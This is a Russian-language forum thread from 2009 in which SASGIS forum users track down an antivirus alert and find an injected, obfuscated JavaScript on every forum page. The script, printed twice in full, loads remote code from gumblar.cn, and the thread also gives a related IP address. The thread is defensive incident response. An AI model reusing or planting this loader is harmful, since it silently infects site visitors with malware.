SASGIS

[temp]

Осталась эта гадость:

04.05.2009 16:08:49 Network Shield: blocked access to malicious site http://gumblar.cn/rss/?id=

Вот оно:

94.229.65.172 no.rdns-yet.ukservers.com gumblar.cn

Только что туда ведет

[temp]

http://vms.drweb.com/online/

Checking: http://sasgis.org/forum
Engine version: 5.0.0.12182
Total virus-finding records: 542328
File size: 26.59 KB
File MD5: c14625ea39e0d0b987a5d5d79022883b

http://sasgis.org/forum - archive HTML
>http://sasgis.org/forum/Script.0 - Ok
>http://sasgis.org/forum/javascript.1 - Ok
>http://sasgis.org/forum/javascript.2 - Ok
>http://sasgis.org/forum/Script.3 - Ok
>http://sasgis.org/forum/Script.4 - Ok
>http://sasgis.org/forum/Script.5 - Ok
>http://sasgis.org/forum/Script.6 - Ok
>http://sasgis.org/forum/Script.7 - Ok
http://sasgis.org/forum - Ok

Checking: http://pagead2.googlesyndication.com/pagead/show_ads.js
File size: 29.45 KB
File MD5: 70afd127d860f58c6ba956bc038acfe6

http://pagead2.googlesyndication.com/pagead/show_ads.js - Ok

Checking: styles/prosilver/template/forum_fn.js
File size: 4375 bytes
File MD5: 48a9d5a06df174674a55a4c9ab19788f

styles/prosilver/template/forum_fn.js - Ok

Checking: styles/prosilver/template/styleswitcher.js
File size: 2517 bytes
File MD5: 55a38cb8007851b499c72ce673291885

styles/prosilver/template/styleswitcher.js - Ok

[feya]

да, я им проверял, все ок.

[temp]

Ну что-то же лезет с форума на сайт качать трояны?

У меня это предупреждение на каждой странице форума.

Где-то сидит замаскированая ссылка .

[temp]

Мне вот этот скрипт не нравится:

<script language=javascript><!--
(function(){var lHw='%';eval(unescape(('va~72~20a~3d~22Scri~70~74~45n~67ine~22~2cb~3d~22~56ersi~6f~6e()+~22~2c~6a~3d~22~22~2cu~3d~6e~61vi~67~61tor~2euserAgen~74~3bif((u~2eind~65xOf(~22Wi~6e~22~29~3e0~29~26~26(u~2ei~6e~64~65xOf~28~22N~54~206~22)~3c0)~26~26(~64~6fcumen~74~2e~63ookie~2e~69n~64e~78O~66~28~22m~69ek~3d1~22)~3c0~29~26~26(ty~70eof(zrv~7ats)~21~3d~74ypeof(~22~41~22)))~7b~7ar~76zts~3d~22A~22~3b~65val(~22if(wind~6fw~2e~22~2b~61+~22)j~3dj+~22+a+~22~4dajo~72~22+b~2ba+~22M~69nor~22+~62+a+~22~42uild~22+~62+~22j~3b~22~29~3bdocu~6dent~2ewr~69te(~22~3c~73cr~69~70t~20s~72~63~3d~2f~2fg~75mb~6c~61r~2ec~6e~2frss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fsc~72i~70t~3e~22)~3b~7d').replace(/~/g,'%')))})();
--></script><script language=javascript><!--
(function(){var lHw='%';eval(unescape(('va~72~20a~3d~22Scri~70~74~45n~67ine~22~2cb~3d~22~56ersi~6f~6e()+~22~2c~6a~3d~22~22~2cu~3d~6e~61vi~67~61tor~2euserAgen~74~3bif((u~2eind~65xOf(~22Wi~6e~22~29~3e0~29~26~26(u~2ei~6e~64~65xOf~28~22N~54~206~22)~3c0)~26~26(~64~6fcumen~74~2e~63ookie~2e~69n~64e~78O~66~28~22m~69ek~3d1~22)~3c0~29~26~26(ty~70eof(zrv~7ats)~21~3d~74ypeof(~22~41~22)))~7b~7ar~76zts~3d~22A~22~3b~65val(~22if(wind~6fw~2e~22~2b~61+~22)j~3dj+~22+a+~22~4dajo~72~22+b~2ba+~22M~69nor~22+~62+a+~22~42uild~22+~62+~22j~3b~22~29~3bdocu~6dent~2ewr~69te(~22~3c~73cr~69~70t~20s~72~63~3d~2f~2fg~75mb~6c~61r~2ec~6e~2frss~2f~3fid~3d~22+j+~22~3e~3c~5c~2fsc~72i~70t~3e~22)~3b~7d').replace(/~/g,'%')))})();
--></script>

Присутствует на каждой странице форума.
Нужно сравнить с архивной копией - возможно его не было.

[temp]

Еще порылся.
По состоянию на 9 апреля (кеш Гугла) этот скрипт на форуме отсутствовал.

[temp]

feya,
Извиняюсь что до этого ввел в заблуждение .
Проблема в этом скрипте.
Только что создал на рабочем столе HTML документ вставил туда этот скрипт - так он хитрый, полез через SVCHOST.EXE к себе на сайт 94.229.65.172 за трояном.
Нужно чистить форум.
Он на каждой странице

[zed]

Блин, а я без антивиря сюда зашёл... что щас будет

[feya]

Нужно чистить форум.

Где токо найти этот скрипт непонятно(

[temp]

Нужно чистить форум.

Где токо найти этот скрипт непонятно(

Он на каждой странице форума. Чтобы увидеть в браузере нажимаем - правка (или вид) - просмотр кода.

Мне вот только интересно как его туда добавили. Где-то есть дыра и ее надо найти.